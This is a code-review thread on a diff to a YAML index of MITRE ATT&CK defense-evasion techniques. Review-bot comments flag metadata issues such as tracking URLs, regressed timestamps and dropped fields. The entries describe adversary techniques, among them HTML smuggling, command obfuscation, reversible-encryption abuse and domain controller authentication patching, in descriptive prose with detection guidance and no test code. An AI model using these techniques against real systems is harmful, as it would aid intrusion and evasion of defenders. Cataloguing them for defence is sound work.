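Review bot: The two Burke/CISA reference URLs in the new T1127.002 entry carry Google Analytics tracking parameters (`?_gl=1*...&_ga=...`); those values are session-specific and will not be stable, so the URLs should be stripped back to the bare `https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-...pdf` form (or kept as upstream emits them, with a note that the generator passes URLs through unmodified). Smaller points in the same hunk: both new entries (T1127.002, T1070.010) ship with `x_mitre_detection: ''`, so they contribute no detection guidance yet; the Latrodectus reference description has a stray space before the full stop ("Bytes Like Ice ."); and `".NET Framework"` is double-quoted where every other scalar in the file uses single quotes. The placement of the new entries between T1564.003 and T1556.009 is consistent with the visible ordering by STIX id (attack-pattern--cc27..., cc36..., cf1c...).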
@@ -11673,10 +11929,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
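Review bot: T1556.009's platform list loses "SaaS" as well as "Azure AD" here, ending up as IaaS plus Identity Provider, whereas the T1562.008 hunk above kept SaaS alongside the new Identity Provider value. If that asymmetry is what upstream publishes it is fine, but it is easy to mistake for a generator bug, so a one-line pointer to the upstream change in the PR description would help reviewers.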
@@ -11713,40 +11968,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
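Review bot: This hunk deletes the entire T1578.002 header block (platforms, domains, marking refs, id, type, created, external_references, modified) only for the same fields to be re-emitted in canonical key order in the following hunk, which makes the diff noisy and hides the substantive deltas. If the generator supports it, serializing with a stable key order before and after would reduce future reviews to the real changes; in this case those are the `modified` timestamp, the version bump, the new contributor, the dropped `x_mitre_permissions_required`, and the Mandiant URL.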
@@ -11755,20 +11980,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
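Review bot: The "Mandiant M-Trends 2020" reference changes its URL from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` but keeps "Retrieved April 24, 2020" in the description; a file under a `2021-09` path cannot have been retrieved on that date, so the retrieved date should be refreshed along with the URL (the nccgroup reference later in this patch does update its retrieved date, which is the pattern to follow). Separately, `x_mitre_permissions_required: - User` is removed from T1578.002 with no replacement, which is covered by the 1.1 to 1.2 version bump but should be called out since downstream filters on required permissions will now skip this entry.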
@@ -11798,7 +12053,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
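Review bot: The `modified` timestamp for T1055.009 moves backwards, from 2021-04-29 to 2020-06-20. A regression in `modified` usually means the source bundle being exported is an older object version than the one previously indexed; please confirm this is what the current upstream release publishes rather than a stale local copy of the STIX data.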
@@ -11841,8 +12096,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
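Review bot: Both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1055.009 here, and no replacement `x_mitre_attack_spec_version` appears in any of the visible hunks for this entry, unlike T1562.008 and the newly added techniques which carry `3.2.0`. Check that the entry still has an attack spec version after the change, or that consumers tolerate its absence.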
@@ -11889,7 +12142,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
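Review bot: Same concern as for T1055.009: `modified` for T1601.001 regresses from 2021-04-29 to 2020-10-22, which suggests the exported object predates the previously indexed one. Confirm against the upstream release.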
@@ -11955,12 +12208,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
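Review bot: Two things in this hunk: T1601.001 loses `x_mitre_attack_spec_version: 2.1.0` with no replacement visible (the same gap as T1055.009), and `modified` for T1070.009 moves backwards from 2023-05-09 to 2023-04-11. Note also that T1601.001 keeps `x_mitre_permissions_required: - Administrator` in the retained context lines, while T1578.002, T1556.001 and T1556.005 have that field removed elsewhere in this patch; if the field is being retired it should go from all entries, otherwise the inconsistency will confuse anyone filtering on it.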
@@ -12015,33 +12266,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
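Review bot: The new T1036.010 description string carries whitespace artifacts: an escaped trailing space before a paragraph break (`\ \n\n`) and a trailing space before the closing quote after "user or service account names." As with T1578.005 above, either trim these in the generator or document that upstream text is passed through untouched. The diff also interleaves deleted T1556.001 lines with added T1036.010 lines, which is just alignment noise from the new entry being inserted ahead of T1556.001 (consistent with STIX id ordering, d349c66e before d4b96d2c), so no action needed there.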
@@ -12062,6 +12364,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -12076,22 +12379,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
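Review bot: `x_mitre_permissions_required: - Administrator` is dropped from T1556.001 in this hunk (and `- User` from T1578.002 earlier), but the unchanged context for T1601.001 in this same patch still shows `x_mitre_permissions_required: - Administrator`. Please state in the PR whether the field is being removed wholesale from the regenerated entries; the 2.0 to 2.1 bump here is consistent with a metadata-only change.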
@@ -12149,48 +12472,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
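Review bot: The nccgroup reference is the right model for URL updates in this patch: the link moves to `https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/` and the retrieved date is refreshed to September 12, 2024 in the same edit. The remaining deletions in this hunk are the T1556.005 header fields being re-emitted in canonical order in the following hunk (with the dump_pwd_dcsync reference moving to the front of the list), so the only substantive change there is the `modified` timestamp.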
@@ -12212,6 +12504,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12222,23 +12515,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
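Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) and `spec_version: '2.1'` are removed from T1556.005 in this hunk with no replacement, while `x_mitre_domains`, `x_mitre_platforms` and `x_mitre_attack_spec_version: 3.2.0` are added. Check that nothing that consumes this index (Markdown/CSV index generation, any filtering on required permissions) still reads `x_mitre_permissions_required`; T1055.015 later in this diff keeps that field, so consumers cannot assume it is uniformly absent. If the field was dropped upstream with the `1.0` to `1.1` bump, a sentence in the PR description would save reviewers the search.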
@@ -12279,8 +12599,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
@@ -12316,43 +12637,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
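Review bot: `- spec_version: '2.1'` is deleted from T1027.010 here and from every other technique object in this diff, never re-added. In STIX 2.1 `spec_version` is a required common property on each object, so this looks like the generator now reading a source bundle that omits it (or a STIX 2.0 export) rather than a per-technique edit. Confirm that is deliberate and that no tooling validates these entries as STIX 2.1 objects; if the source changed, the PR description should say which bundle the index is now built from.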
@@ -12363,18 +12664,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
@@ -12436,7 +12755,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
